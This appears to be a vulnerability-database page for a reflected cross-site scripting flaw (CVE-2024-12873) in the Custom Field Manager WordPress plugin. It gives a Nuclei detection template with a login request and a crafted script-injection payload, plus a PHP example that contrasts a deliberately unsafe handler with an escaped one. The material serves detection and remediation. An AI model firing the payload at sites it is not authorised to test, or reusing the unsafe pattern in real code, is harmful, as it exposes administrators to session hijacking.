
Custom Field Manager WordPress - Cross-Site Scripting

CVE-2024-12873
Verified

Description

Custom Field Manager WordPress plugin through 1.0 contains a reflected XSS caused by unsanitized and unescaped parameter output, letting attackers execute scripts in the browsers of high-privilege users such as admins; exploitation requires a crafted request.

Severity

Medium

CVSS Score

6.1

Exploit Probability

0%

Affected Product

custom_field_manager

Published Date

February 6, 2026

Template Author

sourabh-sahu

CVE-2024-12873.yaml
id: CVE-2024-12873

info:
  name: Custom Field Manager WordPress - Cross-Site Scripting
  author: Sourabh-Sahu
  severity: medium
  description: |
    Custom Field Manager WordPress plugin through 1.0 contains a reflected XSS caused by unsanitized and unescaped parameter output, letting attackers execute scripts in the browsers of high-privilege users such as admins; exploitation requires a crafted request.
  impact: |
    Attackers can execute scripts in admin users' browsers, potentially leading to account compromise or unauthorized actions.
  remediation: |
    Update to the latest version with proper sanitization and escaping.
  reference:
    - https://wpscan.com/vulnerability/3e82d45f-7b8f-424e-a8d7-be64f5acf65e/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-12873
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-12873
    cwe-id: CWE-79
    epss-score: 0.0017
    epss-percentile: 0.37769
    cpe: cpe:2.3:a:f1logic:custom_field_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: f1logic
    product: custom_field_manager
  tags: cve,cve2024,f1logic,custom-field-manager,authenticated,wordpress,wp,wp-plugin,xss

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=custom-field-manager-customfields&taxonomy=testxss%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cscript%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, "text/html")
          - contains_all(body, "</script><script>alert(document.domain)</script><script>","custom-field-manager")
        condition: and
# digest: 4a0a00473045022100f7cf953f452489361949ea17f96fc05c3d3d0e815217a1669107f688d54a955302200764fbcff34feb1d658cce9911448b9349a5a894eff5ce629dd1729cad45a1ea:922c64590222798bb761d5b6d8e72950
CVSS Score: 6.1

CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID: CVE-2024-12873
CWE ID: CWE-79

References

https://wpscan.com/vulnerability/3e82d45f-7b8f-424e-a8d7-be64f5acf65e/
https://nvd.nist.gov/vuln/detail/CVE-2024-12873

Remediation Steps

Update to the latest version with proper sanitization and escaping.
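The following is an added illustration of what "proper sanitization and escaping" means for a reflected request parameter in a WordPress admin page. It is hypothetical example code, not the Custom Field Manager plugin's source; the function names `cfm_demo_render_unsafe` and `cfm_demo_render_safe`, the `manage_options` capability check, and the assumption that the `taxonomy` query parameter is echoed both into HTML text and into an inline script are all assumptions made for the demonstration. The WordPress functions used (`wp_unslash`, `sanitize_key`, `taxonomy_exists`, `esc_html`, `wp_json_encode`, `current_user_can`, `wp_die`) are real core API.

```php
<?php
// Added illustration (hypothetical), not the Custom Field Manager plugin's code.
// Contrasts the unsafe pattern behind a reflected XSS on a WordPress admin page
// with context-aware input validation and output escaping.

// UNSAFE: the raw query parameter is echoed into HTML and into an inline
// <script> block without any escaping, so a crafted "taxonomy" value can
// break out of either context (the template's payload closes a script tag).
function cfm_demo_render_unsafe() {
    $taxonomy = isset( $_GET['taxonomy'] ) ? $_GET['taxonomy'] : '';
    echo '<h2>Fields for taxonomy: ' . $taxonomy . '</h2>';
    echo '<script>var cfmTaxonomy = "' . $taxonomy . '";</script>';
}

// HARDENED: gate on capability, validate on input, escape on output,
// and escape for the context the value actually lands in.
function cfm_demo_render_safe() {
    // Admin-only output still has to be escaped: the reflected script runs
    // in the admin's browser, which is exactly the high-privilege target.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'cfm-demo' ) );
    }

    // Input: a taxonomy name is a slug-like identifier. sanitize_key() keeps
    // only [a-z0-9_-], and taxonomy_exists() rejects anything not registered,
    // so the value can never contain markup in the first place.
    $taxonomy = isset( $_GET['taxonomy'] )
        ? sanitize_key( wp_unslash( $_GET['taxonomy'] ) )
        : '';
    if ( '' !== $taxonomy && ! taxonomy_exists( $taxonomy ) ) {
        $taxonomy = '';
    }

    // Output into HTML text: esc_html() encodes < > & " ' at the point of output.
    echo '<h2>Fields for taxonomy: ' . esc_html( $taxonomy ) . '</h2>';

    // Output into inline JavaScript: HTML escaping alone is not enough here,
    // because "</script>" would still terminate the block. wp_json_encode()
    // emits a JS string literal; JSON_HEX_TAG additionally encodes < and >
    // as \u003C / \u003E so the literal can never close the tag.
    echo '<script>var cfmTaxonomy = '
        . wp_json_encode( $taxonomy, JSON_HEX_TAG | JSON_HEX_AMP )
        . ';</script>';
}
```

With the hardened handler, the crafted value in the template's second request would be reduced by `sanitize_key()` to a plain slug and rejected by `taxonomy_exists()`, so the response body no longer contains the unescaped `</script><script>alert(document.domain)</script><script>` string that the `contains_all` matcher looks for; that absence is the check a defender can use to confirm a fix.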